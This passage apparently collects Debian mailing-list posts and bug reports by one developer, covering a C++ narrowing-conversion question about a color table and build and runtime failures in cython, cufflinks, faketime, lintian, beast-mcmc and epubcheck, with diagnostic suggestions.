{255*.18, 255*.55, 255*.13 },//(Clover)
{255*.55, 255*.38, 255*.21 },//(Dirt)
{255*.42, 255*.09, 255*.69 },//(Royal Violet)
{255*.09, 255*.29, 255*.51 },//(Sea Blue)
{255 , 255*.57, 255*.09 },//(Orange)
{255*.67, 255*.67, 255*.67 },//(Concrete)
{255*.85, 255*.27, 255*.42 } //(Carnation)
};
the narrowing conversion in this case is absolutely intended here
obviously. Is there any more elegant solution for these case than
something like
s:\.\([0-9][0-9]\):\1/100:g
?
Your alternatives are:
- Use -Wno-narrowing to suppress this error.
- Define constructor for _HYColor and then use it.
- Make explicit typecasts from double to int.
Neither of them is particularly elegant...
Either way, you might want to define a temporary macro to make this less
repetitive, e.g.:
_HYColorchartColors [HY_CHART_COLOR_COUNT] = {
#define t(r, g, b) { 255 * r / 100, 255 * g / 100, 255 * b / 100 }
t(94, 12, 11), //(Red)
t(41, 46, 91), //(Evening Blue)
t(100, 91, 34), //(Banana)
// ...
#undef t
};
BTW, _HYColor is not a good name for a structure. In C++, identifiers
that begin with an underscore are reserved.
--
Jakub Wilk
Bug#833923: cython: FTBFS on s390x
* Andreas Tille <ti...@debian.org>, 2016-08-10, 14:15: Failed example: long_double_to_float_int(4.1) Expected: 4.0 Got: 0.0 I couldn't reproduce this on zelenka.d.o. The package built successfully. Also, the code this test exercises is pretty straightforward, so I don't know what could go wrong here. Perhaps it was a toolchain bug that was fixed in the mean time? -- Jakub Wilk
Bug#797280: Please help porting cufflinks to latest libboost
* Andreas Tille <andr...@an3as.eu>, 2016-07-12, 11:12: In file included from /usr/include/eigen3/Eigen/Core:297:0, from /usr/include/eigen3/Eigen/Dense:1, from abundances.h:21, from abundances.cpp:16: /usr/include/eigen3/Eigen/src/Core/DenseCoeffsBase.h: In instantiation of 'Eigen::DenseCoeffsBase<Derived, 0>::CoeffReturnType Eigen::DenseCoeffsBase<Derived, 0>::coeff(Eigen::Index) const [with Derived = Eigen /usr/include/eigen3/Eigen/src/Core/DenseCoeffsBase.h:181:19: required from 'Eigen::DenseCoeffsBase<Derived, 0>::CoeffReturnType Eigen::DenseCoeffsBase<Derived, 0>::operator()(Eigen::Index) const [with Derived abundances.cpp:3815:28: required from here /usr/include/eigen3/Eigen/src/Core/DenseCoeffsBase.h:141:7: error: 'THIS_COEFFICIENT_ACCESSOR_TAKING_ONE_ACCESS_IS_ONLY_FOR_EXPRESSIONS_ALLOWING_LINEAR_ACCESS' is not a member of 'Eigen::internal::static_assert EIGEN_STATIC_ASSERT(internal::evaluator::Flags & LinearAccessBit, ^ Makefile:1627: recipe for target 'abundances.o' failed The relevant code in src/abundances.cpp looks like this: Eigen::VectorXd v; double m = 0; v = U.rowwise().sum(); m = v.colwise().sum()(0); For some reason Eigen thinks that v.colwise().sum() cannot be treated as a one-dimensional vector, which smells like a bug in Eigen. Changing the last line to m = v.colwise().sum()(0, 0); seems to do the trick. Upstream bug report: https://github.com/cole-trapnell-lab/cufflinks/issues/61 -- Jakub Wilk
Bug#830510: faketime: '/usr/lib/faketime/libfaketime.so.1' from LD_PRELOAD cannot be preloaded
Package: faketime Version: 0.9.6-5 Severity: grave faketime no longer works: $ faketime '2008-12-24 08:15:42' date ERROR: ld.so: object '/usr/lib/faketime/libfaketime.so.1' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored. Fri Jul 8 21:02:01 CEST 2016 -- System Information: Debian Release: stretch/sid APT prefers unstable APT policy: (990, 'unstable'), (500, 'experimental') Architecture: i386 (x86_64) Foreign Architectures: amd64 Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores) Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: sysvinit (via /sbin/init) Versions of packages faketime depends on: ii libc62.23-1 ii libfaketime 0.9.6-5 -- Jakub Wilk
Bug#829635: lintian: FTBFS: dpkg-source: error: syntax error in .../debian/tests/control
Source: lintian Version: 2.5.45 Severity: serious Justification: fails to build from source lintian FTBFS when built against dpkg-dev_1.18.9, because the following tests fail: * tests::testsuite-control-not-file | dpkg-buildpackage: info: source package testsuite-control-not-file | dpkg-buildpackage: info: source version 1.0 | dpkg-buildpackage: info: source distribution unstable | dpkg-buildpackage: info: source changed by Debian Lintian Maintainers <lintian-ma...@debian.org> | dpkg-source -iNEVER_MATCH_ANYTHING -INEVER_MATCH_ANYTHING --auto-commit --before-build testsuite-control-not-file-1.0 | dpkg-buildpackage: info: host architecture i386 | dpkg-source: error: test control debian/tests/control is not a regular file | dpkg-buildpackage: error: dpkg-source -iNEVER_MATCH_ANYTHING -INEVER_MATCH_ANYTHING --auto-commit --before-build testsuite-control-not-file-1.0 gave error exit status 255 * tests::testsuite-control-syntax | dpkg-buildpackage: info: source package testsuite-control-syntax | dpkg-buildpackage: info: source version 1.0 | dpkg-buildpackage: info: source distribution unstable | dpkg-buildpackage: info: source changed by Debian Lintian Maintainers <lintian-ma...@debian.org> | dpkg-source -iNEVER_MATCH_ANYTHING -INEVER_MATCH_ANYTHING --auto-commit --before-build testsuite-control-syntax-1.0 | dpkg-buildpackage: info: host architecture i386 | dpkg-source: error: syntax error in testsuite-control-syntax-1.0/debian/tests/control at line 1: line with unknown format (not field-colon-value) | dpkg-buildpackage: error: dpkg-source -iNEVER_MATCH_ANYTHING -INEVER_MATCH_ANYTHING --auto-commit --before-build testsuite-control-syntax-1.0 gave error exit status 25 * tests::testsuite-general: | dpkg-buildpackage: info: source package testsuite-general | dpkg-buildpackage: info: source version 1.0 | dpkg-buildpackage: info: source distribution unstable | dpkg-buildpackage: info: source changed by Debian Lintian Maintainers <lintian-ma...@debian.org> | dpkg-source -iNEVER_MATCH_ANYTHING -INEVER_MATCH_ANYTHING --auto-commit --before-build testsuite-general-1.0 | dpkg-buildpackage: info: host architecture i386 | dpkg-source: error: syntax error in testsuite-general-1.0/debian/tests/control at line 26: block lacks either Tests or Test-Command fields | dpkg-buildpackage: error: dpkg-source -iNEVER_MATCH_ANYTHING -INEVER_MATCH_ANYTHING --auto-commit --before-build testsuite-general-1.0 gave error exit status 25 -- Jakub Wilk
Bug#829174: beast-mcmc: depends on package in contrib
Source: beast-mcmc Version: 1.8.4+dfsg-1 Severity: grave beast-mcmc is main, but it depends on libnucleotidelikelihoodcore0, which is in contrib. This is violation of Policy §2.2.1, and it makes the package uninstallable for users who didn't enable contrib. -- Jakub Wilk
Bug#826864: epubcheck doesn't run anymore
* Joseph Nahmias <j...@nahmias.net>, 2016-06-17, 13:32: joe@skippy:~$ tail -n +1 /proc/sys/fs/binfmt_misc/jar* tail: cannot open ‘/proc/sys/fs/binfmt_misc/jar*’ for reading: No such file or directory joe@skippy:~$ ls -la /proc/sys/fs/binfmt_misc/ total 0 dr-xr-xr-x 2 root root 0 Jun 5 03:57 . dr-xr-xr-x 1 root root 0 Jun 5 03:57 .. Looks like /proc/sys/fs/binfmt_misc is not even mounted... :-\ The binfmt-support init script is responsible for mounting it and registering binfmts. Could you try restarting it and see if it helps? -- Jakub Wilk
Bug#826864: epubcheck doesn't run anymore
Hi Joseph! * Joseph Nahmias <j...@nahmias.net>, 2016-06-09, 15:38: Looks like something broke in a recent update and epubcheck stopped working. Here's what I'm seeing: joe@skippy:~$ /usr/share/java/epubcheck-4.0.0-alpha11.jar /usr/share/java/epubcheck-4.0.0-alpha11.jar: line 1: $'PK\003\004': command not found Could you paste output of this command? tail -n +1 /proc/sys/fs/binfmt_misc/jar* -- Jakub Wilk
